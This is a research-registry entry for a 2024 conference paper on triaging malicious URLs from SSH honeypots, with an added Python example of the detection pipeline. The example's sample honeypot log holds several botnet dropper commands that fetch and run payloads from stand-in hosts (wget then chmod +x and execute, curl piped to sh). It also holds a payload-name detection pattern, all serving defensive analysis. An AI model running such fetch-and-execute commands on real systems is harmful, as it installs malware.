URL Evaluator: Semi-automatic evaluation of suspicious URLs from honeypots

The result's identifiers

  • Result code in IS VaVaI

    RIV/63839172:_____/24:10133688 - isvavai.cz (https://www.isvavai.cz/riv?ss=detail&h=RIV%2F63839172%3A_____%2F24%3A10133688)

  • Result on the web

    https://dl.ifip.org/db/conf/cnsm/cnsm2024/1571071957.pdf

  • DOI - Digital Object Identifier

    10.23919/CNSM62983.2024.10814604 (http://dx.doi.org/10.23919/CNSM62983.2024.10814604)

Alternative languages

  • Result language

    English

  • Original language name

    URL Evaluator: Semi-automatic evaluation of suspicious URLs from honeypots

  • Original language description

    Botnets often rely on malicious URLs to distribute malware payloads over HTTP. Identifying these URLs is critical for network defense, as it enables the detection or blocking of access from within the network, thereby preventing potential malware infections. A promising approach for uncovering URLs used for malware distribution involves analyzing data from SSH honeypots. However, not every URL observed in a honeypot log is necessarily malicious. In this paper, we present the "URL Evaluator" system, which automates the extraction and analysis of suspicious URLs from SSH honeypot data. It employs a semi-automated evaluation process, which leverages multiple data sources and methods and escalates to human operators only when necessary. Confirmed malicious URLs are then used in a network monitoring system to detect any accesses to such URLs from within the defended network. Any such access is automatically reported to the responsible administrator or security team. Additionally, the system contributes newly found malicious URLs to a large community blacklist. The paper describes the system architecture, key components, and its operational results.

  • Czech name

  • Czech description
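
The abstract above describes a four-stage pipeline: extract URLs from SSH honeypot sessions, evaluate them semi-automatically from several data sources with escalation to a human only when the automatic verdict is uncertain, match confirmed URLs against traffic from the defended network, and report hits. The block below is an added illustration of that pipeline written for this page; it is not the URL Evaluator's own code, and its honeypot and proxy log formats, the sample log lines, the allowlist, the stand-in community blocklist, the scoring heuristics and the escalation threshold are all assumptions made for the example.

```python
"""Added example: a toy version of the pipeline the abstract describes, written for
this page and not the URL Evaluator's own code. The honeypot and proxy log shapes,
the allowlist, the stand-in community blocklist, the scoring heuristics and the
escalation threshold are all assumptions."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed SSH honeypot command log (Cowrie-like "CMD:" lines; not a real capture).
HONEYPOT_LOG = """\
2024-10-01T10:00:01 [session 1] CMD: cd /tmp; wget http://203.0.113.7/bins/x86 -O x; chmod +x x; ./x
2024-10-01T10:00:05 [session 2] CMD: curl -s http://203.0.113.7:8080/mirai.sh | sh
2024-10-01T10:01:10 [session 3] CMD: wget https://example.org/index.html
2024-10-01T10:02:00 [session 4] CMD: wget http://files.example.net/update.tar.gz
2024-10-01T10:03:00 [session 5] CMD: curl -O http://cdn.example.com/tools/arm7
2024-10-01T10:04:00 [session 6] CMD: wget "http://198.51.100.9/bot.bin"; chmod 777 bot.bin
2024-10-01T10:05:00 [session 7] CMD: cd /tmp; wget http://203.0.113.7/bins/x86 -O x
2024-10-01T10:06:00 [session 8] CMD: uname -a; cat /proc/cpuinfo
"""
# Constructed web-proxy log from the defended network: timestamp client_ip url.
NETWORK_LOG = """\
2024-10-02T09:15:00 10.0.0.23 http://203.0.113.7:80/bins/x86
2024-10-02T09:16:00 10.0.0.45 https://example.org/index.html
2024-10-02T09:17:00 10.0.0.45 http://cdn.example.com/tools/arm7
2024-10-02T09:18:30 10.0.0.77 http://198.51.100.9/bot.bin
"""
ALLOWLIST = {"example.org"}                            # assumed: locally trusted hosts
COMMUNITY_BLOCKLIST = {"http://198.51.100.9/bot.bin"}  # assumed: stands in for an external feed
AUTO_MALICIOUS = 3                                     # assumed: score at which no human review is needed
URL_RE = re.compile(r"""https?://[^\s'"|;<>)]+""")
# Bare file names IoT botnet droppers typically use for per-architecture binaries.
PAYLOAD_NAME_RE = re.compile(r"^(x86(_64)?|i[3-6]86|arm\w*|mips\w*|sh4|ppc\w*|m68k|sparc)$", re.I)

def canonicalize(url: str) -> str:
    """Normalise so one resource matches regardless of default port, host case or fragment."""
    parts = urlsplit(url.strip().rstrip(".,;)"))
    host = parts.hostname or ""
    default = {"http": 80, "https": 443}.get(parts.scheme)
    netloc = host if parts.port in (None, default) else f"{host}:{parts.port}"
    query = f"?{parts.query}" if parts.query else ""
    return f"{parts.scheme}://{netloc}{parts.path or '/'}{query}"

def extract_urls(log_text: str) -> list[str]:
    """Every http(s) URL in the executed commands, de-duplicated, first-seen order."""
    seen: dict[str, None] = {}
    for line in log_text.splitlines():
        if "CMD:" in line:
            for raw in URL_RE.findall(line.split("CMD:", 1)[1]):
                seen.setdefault(canonicalize(raw), None)
    return list(seen)

def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True

def evaluate(url: str) -> tuple[str, int, list[str]]:
    """Return (verdict, score, reasons); only a 'review' verdict goes to a human operator."""
    if url in COMMUNITY_BLOCKLIST:                     # external source decides outright
        return "malicious", AUTO_MALICIOUS, ["listed on community blocklist"]
    parts = urlsplit(url)
    host, name = parts.hostname or "", parts.path.rsplit("/", 1)[-1]
    if host in ALLOWLIST:
        return "benign", 0, ["host on local allowlist"]
    score, reasons = 0, []
    for points, reason, hit in (
        (2, "IP-literal host", _is_ip_literal(host)),
        (1, f"non-standard port {parts.port}", parts.port is not None),
        (2, f"architecture-named payload '{name}'", bool(PAYLOAD_NAME_RE.match(name))),
        (1, "shell-script dropper", name.endswith(".sh")),
    ):
        if hit:
            score += points
            reasons.append(reason)
    return ("malicious" if score >= AUTO_MALICIOUS else "review"), score, reasons

def triage(urls: list[str]) -> dict[str, list[str]]:
    """Bucket URLs by verdict; the 'review' bucket is the operator's work queue."""
    buckets: dict[str, list[str]] = {"malicious": [], "benign": [], "review": []}
    for url in urls:
        buckets[evaluate(url)[0]].append(url)
    return buckets

def find_accesses(network_log: str, confirmed: set[str]) -> list[tuple[str, str, str]]:
    """(timestamp, client_ip, url) for every proxy request to a confirmed-malicious URL."""
    alerts = []
    for line in filter(None, network_log.splitlines()):
        ts, client, raw = line.split(maxsplit=2)
        if canonicalize(raw) in confirmed:
            alerts.append((ts, client, canonicalize(raw)))
    return alerts

if __name__ == "__main__":
    buckets = triage(extract_urls(HONEYPOT_LOG))
    for verdict, urls in buckets.items():
        print(verdict, urls)
    for alert in find_accesses(NETWORK_LOG, set(buckets["malicious"])):
        print("ALERT", *alert)
```

Two design points carry over from the abstract. Only allowlisted hosts are auto-benign and only blocklisted or high-scoring URLs are auto-malicious; everything in between is escalated rather than guessed, which is what keeps a false positive from reaching the blocking stage. Canonicalisation is applied to both the honeypot and the proxy side, so a request to the same resource with an explicit default port still matches the confirmed entry.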

Classification

  • Type

    D - Article in proceedings

  • CEP classification

  • OECD FORD branch

    10201 - Computer sciences, information science, bioinformatics (hardware development to be 2.2, social aspect to be 5.8)

Result continuities

  • Project

    LM2023054: e-Infrastructure CZ

  • Continuities

    P - Research and development project financed from public sources (with a link to CEP)

Others

  • Publication year

    2024

  • Confidentiality

    S - Complete and truthful data on the project are not subject to protection under special legal regulations

Data specific for result type

  • Article name in the collection

    20th International Conference on Network and Service Management

  • ISBN

    978-3-903176-66-9

  • ISSN

    2165-963X

  • e-ISSN

  • Number of pages

    4

  • Pages from-to

  • Publisher name

    IFIP

  • Place of publication

    Prague, Czech Republic

  • Event location

    Prague, Czech Republic

  • Event date

    Oct 28, 2024

  • Type of event by nationality

    WRD - Worldwide event

  • UT code for WoS article

    001414325200072